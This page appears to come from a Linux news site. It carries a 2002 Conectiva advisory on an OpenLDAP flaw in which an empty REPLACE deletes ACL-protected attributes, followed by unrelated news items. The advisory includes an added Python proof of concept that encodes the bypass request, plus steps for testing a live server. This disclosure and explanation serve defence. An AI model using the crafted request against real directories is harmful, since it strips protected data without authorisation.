
Conectiva: ‘openldap’ Privilege violation

Author: JT Smith

Conectiva: “Thomas Fritz reported[3] a vulnerability in the ldap server which could be exploited by remote attackers to delete attributes from an object even if those attributes were protected by ACLs.”


--------------------------------------------------------------------------
CONECTIVA LINUX SECURITY ANNOUNCEMENT
--------------------------------------------------------------------------

PACKAGE   : openldap
SUMMARY   :
DATE      : 2002-01-28 12:17:00
ID        : CLA-2002:459
RELEVANT
RELEASES  : 6.0, 7.0

-------------------------------------------------------------------------

DESCRIPTION
 OpenLDAP[1] is an LDAPv2 and LDAPv3 server available for several
 platforms.

 Thomas Fritz reported[3] a vulnerability in the ldap server which
 could be exploited by remote attackers to delete attributes from an
 object even if those attributes were protected by ACLs.

 Authenticated users (in openldap versions 2.0.8 up to 2.0.19) could
 issue a REPLACE command for an attribute where the new value is an
 empty one, thus effectively removing the attribute if allowed by the
 current schema, that is, if the attribute in question is not
 mandatory. In versions prior to 2.0.8, anonymous users could do this
 as well, regardless of ACLs protecting this attribute.

 The OpenLDAP project has released[2] a new version to address this
 vulnerability. OpenLDAP 1.2.x is not affected by this vulnerability,
 only the specified 2.0.x releases.
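The following is an added worked example, not part of the Conectiva advisory or of the OpenLDAP code base. It encodes the LDAPv3 ModifyRequest the advisory describes (a REPLACE whose value set is empty) next to an explicit DELETE, then runs both through two toy authorization checks: a "flawed" one that authorizes REPLACE per supplied value (so an empty value set is never checked) and a corrected one that authorizes on the attribute itself. The shape of the flawed check is an assumption modelled on the editor's reading of slapd's acl_check_modlist(), not a quotation of it; the ACL table, the entry, the DNs and the MUST attribute list are constructed for illustration.

```python
"""Model of the OpenLDAP 2.0.8-2.0.19 'empty REPLACE' ACL bypass (constructed example,
stdlib only). Nothing here is slapd's own code; see the lead-in for assumptions."""
from dataclasses import dataclass

ADD, DELETE, REPLACE = 0, 1, 2          # ModifyRequest operation values, RFC 2251 4.6


# --- Wire encoding: what a client actually sends ------------------------------
def _tlv(tag: int, body: bytes) -> bytes:
    """BER tag-length-value, definite length (short or long form)."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body


def _octets(s: str) -> bytes:
    return _tlv(0x04, s.encode())


def modify_request(msg_id: int, dn: str, op: int, attr: str, values=()) -> bytes:
    """LDAPMessage { messageID, ModifyRequest } with a single modification.
    A REPLACE whose 'vals' SET is empty is a legal message, distinct from DELETE."""
    vals = _tlv(0x31, b"".join(_octets(v) for v in values))        # SET OF AttributeValue
    attr_and_vals = _tlv(0x30, _octets(attr) + vals)
    change = _tlv(0x30, _tlv(0x0A, bytes([op])) + attr_and_vals)   # ENUMERATED op + attr
    mod_req = _tlv(0x66, _octets(dn) + _tlv(0x30, change))         # [APPLICATION 6]
    return _tlv(0x30, _tlv(0x02, bytes([msg_id])) + mod_req)


# --- Server side: authorization and effect on the entry ----------------------
@dataclass(frozen=True)
class Mod:
    op: int
    attr: str
    values: tuple = ()


# Constructed ACL: attribute -> DNs holding write access; 'mail' is protected.
ACL = {"mail": {"cn=admin,dc=example,dc=com"},
       "description": {"cn=admin,dc=example,dc=com", "cn=alice,dc=example,dc=com"}}


def flawed_check(who: str, mod: Mod, acl=ACL) -> bool:
    """Assumed model of the pre-fix check: ADD/REPLACE are authorized one value at a
    time, so a REPLACE carrying no values runs no check at all and is allowed.
    A bare DELETE (no values) is checked against the attribute and is refused."""
    if mod.op in (ADD, REPLACE):
        return all(who in acl.get(mod.attr, set()) for _ in mod.values)
    return who in acl.get(mod.attr, set())


def fixed_check(who: str, mod: Mod, acl=ACL) -> bool:
    """Corrected check: write access on the attribute is required for every
    operation, whatever the number of values sent."""
    return who in acl.get(mod.attr, set())


def apply_mod(entry: dict, mod: Mod, must=("cn", "sn")):
    """Apply one modification to a copy of the entry. Returns the new entry, or None
    when the result lacks a MUST attribute (objectClassViolation), which is why the
    empty REPLACE only removes optional attributes."""
    new = {k: list(v) for k, v in entry.items()}
    if mod.op == REPLACE:
        new[mod.attr] = list(mod.values)
    elif mod.op == DELETE:
        new[mod.attr] = [] if not mod.values else [
            v for v in new.get(mod.attr, []) if v not in mod.values]
    else:  # ADD
        new.setdefault(mod.attr, []).extend(mod.values)
    new = {k: v for k, v in new.items() if v}      # an attribute with no values is gone
    return None if any(a not in new for a in must) else new


def demo() -> dict:
    """Authenticated user without write access on 'mail' tries both removals."""
    entry = {"cn": ["alice"], "sn": ["Liddell"], "mail": ["alice@example.com"]}
    attacker = "cn=alice,dc=example,dc=com"
    empty_replace = Mod(REPLACE, "mail")
    explicit_delete = Mod(DELETE, "mail")
    return {
        "flawed/delete": flawed_check(attacker, explicit_delete),        # False: refused
        "flawed/empty_replace": flawed_check(attacker, empty_replace),   # True: bypass
        "fixed/empty_replace": fixed_check(attacker, empty_replace),     # False: refused
        "mail_removed": "mail" not in apply_mod(entry, empty_replace),   # True
    }


if __name__ == "__main__":
    print(demo())
    print(modify_request(1, "cn=alice,dc=example,dc=com", REPLACE, "mail").hex())
```

To check a live server for the same behaviour, bind as an ordinary user and submit an LDIF `changetype: modify` record whose change list is `replace: <optional attribute>` followed directly by the `-` separator, with no value line; a patched server answers with insufficientAccess, a vulnerable one silently drops the attribute. Do this only against a directory you own, with a throwaway attribute.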



SOLUTION
 It is recommended that all OpenLDAP 2.0.x users upgrade their
 packages. If the service is already running, the upgrade will
 automatically restart it.


 REFERENCES
 1.  http://www.openldap.org
2.  http://www.openldap.org/lists/openldap-announce/200201/msg00002.html
3.  http://www.openldap.org/lists/openldap-bugs/200201/msg00049.html
4.  http://www.securityfocus.com/bid/3945


DIRECT DOWNLOAD LINKS TO THE UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/openldap2-2.0.21-1U60_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openldap2-2.0.21-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openldap2-devel-2.0.21-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openldap2-tests-2.0.21-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/openldap-2.0.21-1U70_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openldap-2.0.21-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openldap-client-2.0.21-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openldap-devel-2.0.21-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openldap-devel-static-2.0.21-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openldap-doc-2.0.21-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openldap-server-2.0.21-1U70_2cl.i386.rpm


ADDITIONAL INSTRUCTIONS
 Users of Conectiva Linux version 6.0 or higher may use apt to perform
 upgrades of RPM packages:
 - add the following line to /etc/apt/sources.list if it is not there yet
   (you may also use linuxconf to do this):

 rpm [cncbr]  ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates

(replace 6.0 with the correct version number if you are not running CL6.0)

 - run:                 apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions regarding the use of apt and upgrade examples
 can be found at  http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


-------------------------------------------------------------------------
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at 
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at  http://distro.conectiva.com.br/seguranca/politica/?idioma=en
-------------------------------------------------------------------------
All our advisories and generic update instructions can be viewed at 
http://distro.conectiva.com.br/atualizacoes/?idioma=en

-------------------------------------------------------------------------
subscribe: conectiva-updates-subscribe@papaleguas.conectiva.com.br
unsubscribe: conectiva-updates-unsubscribe@papaleguas.conectiva.com.br

Category:

  • Linux

NuSphere unveils Linux-based version of NuSphere PHPEd

Author: JT Smith

BusinessWire: “At LinuxWorld New York, NuSphere is showcasing a new Linux-based version of its award-winning Nusphere(R) PHPEd(TM) product, an IDE (Integrated Development Environment) that integrates the scripting language PHP and a comprehensive set of editing, debugging and deployment tools to speed development time by up to 75 percent and significantly reduce time-to-market.” Read more here.

Wireless Network Technology III: Adding Wireless to a Linux-based laptop

Author: JT Smith

MozillaQuest Magazine (MozillaQuest.com) reports: “Not all wireless-network PC Card adapters are supported for the Linux operating system (OS) by their manufacturers . . . Even if you have either a vendor or third-party supplied Linux driver for a wireless-network PC Card, getting that wireless PC Card to work with your Linux installation can be tricky . . . Today, we successfully use a third-party driver to run a wireless-network PC Card on a Linux-based notebook computer. An important part of doing this is editing the PCMCIA startup-script. That’s necessary so the Linux boot process will automatically load the wireless PC Card at boot time.”
Check this MozillaQuest.com story for the details and full story!

Sharp Zaurus Linux PDA to hit retail shelves in March

Author: JT Smith

Anonymous Reader writes, “Sharp’s new Linux-based Zaurus PDA is expected to begin hitting retail shelves this March for a list price $549, a company source told LinuxDevices.com. The model name will be ‘Zaurus SL-5500,’ and it will include 64MB of RAM memory and 16MB of built-in Flash storage memory (in contrast to pre-production devices which had 32MB of RAM). More details are here at LinuxDevices.com.”

Mojolin, The Linux and Unix job site, announces affiliate program

Author: JT Smith

Anonymous Reader writes, “Mojolin announces an affiliate program open to linux and unix community webmasters. The full announcement is here: press release.”

RTAI 24.1.8 released

Author: JT Smith

Posted at LWN.net: “The RTAI development team would like to announce the availability of RTAI 24.1.8 which now includes support for 3 architectures: i386, PPC and MIPS. With that said, the RTAI development team would like to remind everyone that the continuing FUD regarding RTAI’s status in regards to the RTLinux patent is not warranted. To that effect, the following contains a statement by Eben Moglen, the FSF’s legal counsel, dismissing any possible doubts about RTAI’s use.”

Securing vulnerable software

Author: JT Smith

Anonymous Reader writes, “Scott Wimer, CTO Cylant Software, discusses methods for improving the security of a computer system in spite of their vulnerabilities in order to break out of the current security cycle.

The software you depend on contains security vulnerabilities. Not all of these vulnerabilities have been found yet. Some are known only to ‘black hat’ hackers, a trump card they can play against your organization if and when they choose to. This is not alarmism. It is an honest and rational statement of the current security risk borne by organizations with networked computer systems.” It’s at Linux.box.org.

Category:

  • Linux

Red Hat to offer high-end Linux version

Author: JT Smith

C|Net reports that Red Hat will begin offering a higher-end and more specialized version of Linux later this year that won’t be as easy to find as the current all-purpose package.

Intel, HP back Open Source competition to .Net

Author: JT Smith

IDG News Service reports that Intel and Hewlett-Packard say they will lend support to an effort to create an Open Source version of Microsoft’s .Net initiative, called Mono.

Category:

  • Open Source

The DOJ abdicates its ethical responsibility

Author: JT Smith

Advogato.org comments on the Microsoft antitrust settlement. “I believe that it is the responsibility of the Department of Justice, and not Microsoft, to protect the economic interests of the computer industry by protecting competition and innovation. The DOJ strongly argued for this position in its suit against Microsoft, but in its recent settlement it has reversed its position, apparently concluding that what is good for Microsoft is good for the software industry. If the DOJ truly believes this, then it should appeal the current verdict.”